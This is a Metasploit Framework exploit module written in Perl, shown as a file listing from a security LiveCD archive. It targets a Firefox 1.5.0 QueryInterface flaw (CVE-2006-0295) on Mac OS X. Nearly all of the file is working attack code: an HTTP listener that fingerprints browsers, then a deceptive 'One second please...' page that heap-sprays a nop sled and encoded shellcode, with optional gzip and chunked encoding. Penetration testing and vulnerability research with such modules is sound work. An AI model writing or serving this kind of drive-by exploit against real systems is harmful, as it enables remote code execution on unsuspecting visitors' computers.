home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / firefox_queryinterface_osx.pm < prev    next >
Text File  |  2006-06-30  |  6KB  |  274 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::firefox_queryinterface_osx;
  11.  
  12. use strict;
  13. use base "Msf::Exploit";
  14. use Pex::Text;
  15. use IO::Socket::INET;
  16. use IPC::Open3;
  17.  
  18. my $advanced =
  19.   {
  20.     'Gzip'       => [1, 'Enable gzip content encoding'],
  21.     'Chunked'    => [1, 'Enable chunked transfer encoding'],
  22.   };
  23.  
  24. my $info =
  25.   {
  26.     'Name'           => 'Firefox location.QueryInterface() Code Execution (Mac OS X)',
  27.     'Version'        => '$Revision: 1.2 $',
  28.     'Authors'        =>
  29.       [
  30.         'H D Moore <hdm [at] metasploit.com>',
  31.       ],
  32.  
  33.     'Description'    =>
  34.       Pex::Text::Freeform(qq{
  35.         This module exploits a code execution vulnerability in the Mozilla
  36.     Firefox browser. To reliably exploit this vulnerability, we need to fill
  37.     almost a gigabyte of memory with our nop sled and payload. This module has
  38.     been tested on OS X 10.3 with the stock Firefox 1.5.0 package.
  39. }),
  40.  
  41.     'Arch'           => [ 'ppc' ],
  42.     'OS'             => [ 'osx' ],
  43.     'Priv'           => 0,
  44.  
  45.     'UserOpts'       =>
  46.       {
  47.         'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
  48.         'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
  49.       },
  50.  
  51.     'Payload'        =>
  52.       {
  53.         'Space'    => 1024,
  54.         'BadChars' => "\x00",
  55.         'Keys'     => ['-bind'],
  56.       },
  57.     'Refs'           =>
  58.       [
  59.           ['OSVDB', '22893'],      
  60.           ['CVE', '2006-0295'],
  61.           ['BID', '16476'],
  62.           ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
  63.       ],
  64.  
  65.     'DefaultTarget'  => 0,
  66.     'Targets'        =>
  67.       [
  68.         [ 'Mozilla Firefox 1.5.0.0 on Mac OS X' ]
  69.       ],
  70.     
  71.     'Keys'           => [ 'mozilla' ],
  72.  
  73.     'DisclosureDate' => 'Feb 02 2006',
  74.   };
  75.  
  76. sub new {
  77.     my $class = shift;
  78.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  79.     return($self);
  80. }
  81.  
  82. sub Exploit
  83. {
  84.     my $self = shift;
  85.     my $server = IO::Socket::INET->new(
  86.         LocalHost => $self->GetVar('HTTPHOST'),
  87.         LocalPort => $self->GetVar('HTTPPORT'),
  88.         ReuseAddr => 1,
  89.         Listen    => 1,
  90.         Proto     => 'tcp'
  91.     );
  92.     my $client;
  93.  
  94.     # Did the listener create fail?
  95.     if (not defined($server)) {
  96.         $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
  97.         return;
  98.     }
  99.  
  100.     my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
  101.         Pex::Utils::SourceIP('1.2.3.4') :
  102.         $self->GetVar('HTTPHOST');
  103.  
  104.     $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
  105.  
  106.     while (defined($client = $server->accept())) {
  107.         $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
  108.     }
  109.  
  110.     return;
  111. }
  112.  
  113. sub HandleHttpClient
  114. {
  115.     my $self = shift;
  116.     my $fd   = shift;
  117.  
  118.     # Set the remote host information
  119.     my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
  120.         
  121.  
  122.     # Read the HTTP command
  123.     my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
  124.     my $agent;
  125.     
  126.     # Read in the HTTP headers
  127.     while ((my $line = $fd->RecvLine(10))) {
  128.         
  129.         $line =~ s/^\s+|\s+$//g;
  130.         
  131.         my ($var, $val) = split(/\:/, $line, 2);
  132.  
  133.         # Break out if we reach the end of the headers
  134.         last if (not defined($var) or not defined($val));
  135.  
  136.         $agent = $val if $var =~ /User-Agent/i;
  137.     }
  138.     
  139.     my $os = 'Unknown';
  140.     my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable';
  141.     
  142.     $os = 'Linux'     if $agent =~ /Linux/i;
  143.     $os = 'Mac OS X'  if $agent =~ /OS X/i;
  144.     $os = 'Windows'   if $agent =~ /Windows/i;    
  145.     
  146.     
  147.     $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl).");
  148.     
  149.     if ($os ne 'Mac OS X') {
  150.         $self->PrintLine("[*] Invalid target for this exploit, trying anyways...");
  151.     } else {
  152.         $self->PrintLine("[*] Sending payload and waiting for execution...");    
  153.     }
  154.  
  155.     my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
  156.  
  157.     $fd->Close();
  158. }
  159.  
  160. sub JSUnescapePPC {
  161.     my $self = shift;
  162.     my $data = shift;
  163.     my $code = '';
  164.     
  165.     # Encode the shellcode via %u sequences for JS's unescape() function
  166.     my $idx = 0;
  167.     while ($idx < length($data) - 1) {
  168.         my $c1 = ord(substr($data, $idx, 1));
  169.         my $c2 = ord(substr($data, $idx+1, 1));    
  170.         $code .= sprintf('%%u%.2x%.2x', $c1, $c2);    
  171.         $idx += 2;
  172.     }
  173.     
  174.     return $code;
  175. }
  176.  
  177. sub GenerateHTML {
  178.     my $self        = shift;
  179.     my $target      = $self->Targets->[$self->GetVar('TARGET')];
  180.     my $shellcode   = $self->JSUnescapePPC($self->GetVar('EncodedPayload')->Payload);
  181.     my $data        = qq#
  182. <html>
  183. <head>
  184.     <title>One second please...</title>
  185.     <script language="javascript">
  186.  
  187.         function BodyOnLoad() {
  188.             h = FillHeap();
  189.             location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
  190.         };
  191.         
  192.         function FillHeap() {
  193.             // Filler
  194.             var m = "";
  195.             var h = "";
  196.             var a = 0;
  197.             
  198.             // Nop sled
  199.             for(a=0; a<(1024*256); a++)
  200.                 m += unescape("\%u6060\%u6060");
  201.  
  202.             // Payload
  203.             m += unescape("$shellcode");
  204.             
  205.             // Repeat
  206.             for(a=0; a<1024; a++)
  207.                 h += m;
  208.             
  209.             // Return
  210.             return h;
  211.         }
  212.     </script>
  213. </head>
  214. <body onload="BodyOnLoad()">
  215. </body>
  216. </html>
  217. #;
  218.     return $data;
  219. }
  220.  
  221. sub BuildResponse {
  222.     my ($self, $content) = @_;
  223.  
  224.     my $response =
  225.       "HTTP/1.1 200 OK\r\n" .
  226.       "Content-Type: text/html\r\n";
  227.  
  228.     if ($self->GetVar('Gzip')) {
  229.         $response .= "Content-Encoding: gzip\r\n";
  230.         $content = $self->Gzip($content);
  231.     }
  232.     if ($self->GetVar('Chunked')) {
  233.         $response .= "Transfer-Encoding: chunked\r\n";
  234.         $content = $self->Chunk($content);
  235.     } else {
  236.         $response .= 'Content-Length: ' . length($content) . "\r\n" .
  237.           "Connection: close\r\n";
  238.     }
  239.  
  240.     $response .= "\r\n" . $content;
  241.  
  242.     return $response;
  243. }
  244.  
  245. sub Chunk {
  246.     my ($self, $content) = @_;
  247.  
  248.     my $chunked;
  249.     while (length($content)) {
  250.         my $chunk = substr($content, 0, int(rand(10) + 1), '');
  251.         $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
  252.     }
  253.     $chunked .= "0\r\n\r\n";
  254.  
  255.     return $chunked;
  256. }
  257.  
  258. sub Gzip {
  259.     my $self = shift;
  260.     my $data = shift;
  261.     my $comp = int(rand(5))+5;
  262.  
  263.     my($wtr, $rdr, $err);
  264.  
  265.     my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
  266.     print $wtr $data;
  267.     close ($wtr);
  268.     local $/;
  269.  
  270.     return (<$rdr>);
  271. }
  272.  
  273. 1;
  274.